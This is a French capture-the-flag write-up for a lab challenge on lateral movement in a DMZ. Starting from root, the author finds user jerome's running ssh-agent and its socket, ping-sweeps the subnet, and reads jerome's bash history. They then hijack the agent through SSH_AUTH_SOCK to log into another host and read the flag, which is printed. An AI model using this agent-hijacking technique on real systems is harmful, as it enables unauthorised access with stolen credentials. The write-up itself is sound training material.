# Write up Game of Drones 3 (part 2)

## Consigne:

```
Vous avez "un pied" dans la DMZ de l'entreprise, avec des droits privilégiés (root). Essayez d'explorer le réseau DMZ, et de vous déplacer latéralement.

Pour réaliser ce challenge, vous devez avoir réussi "*Game of Drones 3 - part 1*", et utiliser le même environnement virtuel.
```

## Pièce jointe :

*Néant*

## Serveur :

```
PortailVMS
```

## Points attribués :

```
TODO
```

## Hint : 

```
TODO
```

## Flag :

```
fl@g{SSHforward4gent3XPloitation}
```

## Solution : 

quand je visualise les processus, un **agent ssh**, appartenant à l'utilisateur *jerome* est actif :

```bash
ps aux | grep ssh-agent
jerome      81  0.0  0.0  10700   336 ?        Ss   17:25   0:00 ssh-agent -s -t 14000
```
Un socket associé à ce processus est présent, et de plus je suis root ...
```bash
find /tmp/ssh-* -name "agent.*"
/tmp/ssh-nEj4KzN4tJPH/agent.80
```

Je vais scanner le réseau, pour essayer de trouver des machines sur le même LAN :
```bash
ip a                                        
...
519: eth0@if518: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 5a:ab:11:22:6e:5b brd ff:ff:ff:ff:ff:ff
    inet 192.168.5.2/24 scope global eth0
       valid_lft forever preferred_lft forever

ip route
default via 192.168.5.1 dev eth0 
192.168.5.0/24 dev eth0  proto kernel  scope link  src 192.168.5.2

bash -i
for i in {1..254} ;do (ping 192.168.5.$i -c 1 -w 5  >/dev/null && echo "192.168.5.$i" &) ;done
192.168.5.1
192.168.5.2
192.168.5.14
```

3 adresses trouvées :
 - 192.168.5.1 : la route par défaut
 - 192.168.5.2 : le serveur tomcat
 - 192.168.5.14 : ???


En visualisant le fichier *.bash_history* de l'utilisateur *jerome* :
```
cat ~jerome/.bash_history
...
man ssh-agent
eval `ssh-agent -s`
man ssh-add
ssh-add ~/.ssh/id_rsa_jerome
ssh-add -l
ssh jerome@192.168.5.14
...
```

En tant que root, Je vais tenter de me connecter en ssh, en utilisant l'agent ssh de l'utilisateur *jerome* (j'ai un souci d'absence de *stdin* avec un message d'erreur de ssh-client, je rajoute l'option `StrictHostKeyChecking=no` pour ne pas vérifier l'empreinte du serveur) :
```bash
SSH_AUTH_SOCK="$(find /tmp/ssh-* -name 'agent.*' | head -n 1)" ssh -o StrictHostKeyChecking=no jerome@192.168.5.14
Linux lxd-f3c67-ssh-dmz 4.15.0-167-generic #175-Ubuntu SMP Wed Jan 5 01:56:07 UTC 2022 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bash -i
bash: cannot set terminal process group (189): Inappropriate ioctl for device
bash: no job control in this shell
jerome@lxd-e9976-ssh-dmz:~$ id
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome)
jerome@lxd-e9976-ssh-dmz:~$ ls -l
ls -l
total 4
-rw-r----- 1 jerome jerome 80 Feb  8 17:40 flag
jerome@lxd-e9976-ssh-dmz:~$
```

Une fois connecté, un fichier *flag* est présent dans le répertoire de l'utilisateur *jerome* :
```bash
cat ~/flag
fl@g{SSHforward4gent3XPloitation}
```
Validez le flag et passez à la partie 3 :-)

Je passe ensuite à la partie 3 ...

<!-- Ok F : 20220423 -->